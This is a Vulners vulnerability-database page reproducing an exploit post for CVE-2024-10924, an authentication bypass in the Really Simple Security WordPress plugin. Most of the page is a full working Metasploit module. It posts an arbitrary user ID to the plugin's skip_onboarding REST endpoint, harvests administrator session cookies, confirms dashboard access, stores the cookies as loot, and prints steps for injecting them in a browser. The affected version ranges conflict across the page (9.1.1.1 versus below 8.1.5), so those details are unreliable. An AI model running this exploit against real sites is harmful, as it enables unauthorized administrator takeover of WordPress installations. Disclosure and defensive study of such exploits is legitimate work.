Vulners
Lucene search
📄 WordPress Really Simple Security 9.1.1.1 Authentication Bypass
10
=============================================================================================================================================
| # Title : WordPress Really Simple Security 9.1.1.1 authentication bypass vulnerability |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits) |
| # Vendor : https://wordpress.org/plugins/ |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/214234/ & CVE-2024-10924
[+] Summary : This module exploits an authentication bypass vulnerability (CVE-2024-10924) in the Really Simple SSL plugin for WordPress (versions <= 9.1.1.1).
The vulnerability exists in the skip_onboarding REST API endpoint.
When exploited, the module allows unauthenticated attackers to gain full administrator access by impersonating a valid user ID.
[+] Usage :
# 1. Vulnerability Check
msf6 > use exploit/multi/http/wordpress_really_simple_ssl_auth_bypass
msf6 exploit(...) > set RHOSTS target.com
msf6 exploit(...) > set TARGETURI /wordpress
msf6 exploit(...) > check
[+] target.com:80 - Vulnerable version 8.1.3 detected
# 2. Exploiting the Vulnerability to Obtain Cookies
msf6 exploit(...) > exploit
[*] Starting authentication bypass attempt...
[+] Authentication bypass successful!
[+] Admin access confirmed!
[+] MANUAL EXPLOITATION INSTRUCTIONS
======================================
[+] Authentication Bypass Successful!
Cookies obtained: wordpress_logged_in_abc=...
[+] Next Steps:
1. Visit: http://target.com/wordpress/wp-admin
2. Use cookies from above
3. You should have admin access
# 3. Manual Exploitation
# Using curl or your browser with cookies
[+] POC :
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'WordPress Really Simple SSL Plugin Authentication Bypass',
'Description' => %q{
This module exploits an authentication bypass vulnerability (CVE-2024-10924)
in the Really Simple SSL plugin for WordPress (versions < 8.1.5).
The vulnerability exists in the skip_onboarding REST API endpoint.
When exploited, the module allows unauthenticated attackers to gain
full administrator access by impersonating a valid user ID.
},
'Author' => [
'JoshuaProvoste', # Original Discovery
'indoushka' # Professional Refinement
],
'License' => MSF_LICENSE,
'References' => [
['CVE', '2024-10924'],
['URL', 'https://www.wordfence.com/blog/2024/11/critical-authentication-bypass-vulnerability-patched-in-really-simple-ssl-plugin/'],
['URL', 'https://really-simple-ssl.com/cve-2024-10924-authentication-bypass/']
],
'DisclosureDate' => '2024-11-06',
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' => [
['WordPress Really Simple SSL < 8.1.5', {}]
],
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [RELIABLE_SIDE_EFFECTS],
'SideEffects' => [IOC_IN_LOGS]
}
))
register_options([
OptString.new('TARGETURI', [true, 'The base path to WordPress', '/']),
OptInt.new('USER_ID', [true, 'User ID to impersonate (Administrator is usually 1)', 1])
])
end
def check
vprint_status("Checking Really Simple SSL version...")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'wp-content/plugins/really-simple-ssl/readme.txt')
})
return CheckCode::Unknown('Target unreachable') unless res
if res.code == 200 && res.body.include?('Really Simple SSL')
version = res.body.scan(/Stable tag:\s*([\d.]+)/).flatten.first
if version
vprint_status("Found version: #{version}")
if Rex::Version.new(version) < Rex::Version.new('8.1.5')
return CheckCode::Appears("Vulnerable version #{version} detected")
end
return CheckCode::Safe("Version #{version} is not vulnerable")
end
end
CheckCode::Safe
end
def exploit
api_path = normalize_uri(target_uri.path, 'wp-json', 'reallysimplessl', 'v1', 'two_fa', 'skip_onboarding')
print_status("Attempting authentication bypass on #{datastore['RHOST']}...")
res = send_request_cgi({
'method' => 'POST',
'uri' => api_path,
'headers' => { 'Content-Type' => 'application/json' },
'data' => {
'user_id' => datastore['USER_ID'],
'login_nonce' => Rex::Text.rand_text_alphanumeric(14),
'redirect_to' => '/wp-admin/'
}.to_json
})
unless res && res.get_cookies =~ /wordpress_(logged_in|sec)_/
fail_with(Failure::NoAccess, "Bypass failed. No valid session cookies found in response.")
end
@cookies = res.get_cookies
print_good("Successfully obtained authentication cookies.")
print_status("Verifying administrative access...")
if verify_admin_access
print_good("Admin access confirmed via dashboard check!")
loot_path = store_loot(
'wp.cookies',
'text/plain',
datastore['RHOST'],
@cookies,
'wordpress_session_cookies',
"CVE-2024-10924 Auth Bypass - User ID: #{datastore['USER_ID']}"
)
print_status("Session cookies stored at: #{loot_path}")
report_instructions
return
else
print_warning("Cookies obtained but admin verification failed. User ID might not have admin rights.")
print_line("Cookies: #{@cookies}")
end
end
def verify_admin_access
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'wp-admin', 'plugin-install.php'),
'cookie' => @cookies
})
res && res.code == 200 && res.body.include?('plugin-install.php') && !res.body.include?('wp-login.php')
end
def report_instructions
admin_url = full_uri(normalize_uri(target_uri.path, 'wp-admin/'))
print_line("\n" + "="*70)
print_line(" EXPLOITATION COMPLETED SUCCESSFULLY")
print_line("="*70)
print_line("Admin URL: #{admin_url}")
print_line("Cookies: #{@cookies}")
print_line("\nInstructions:")
print_line("1. Open your browser and navigate to the Admin URL.")
print_line("2. Use a cookie editor extension to inject the cookies above.")
print_line("3. Refresh the page to access the WordPress dashboard.")
print_line("="*70 + "\n")
end
end
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
02 Mar 2026 00:00Current
5.9Medium risk
Vulners AI Score5.9
CVSS 3.19.8
EPSS0.93889
SSVC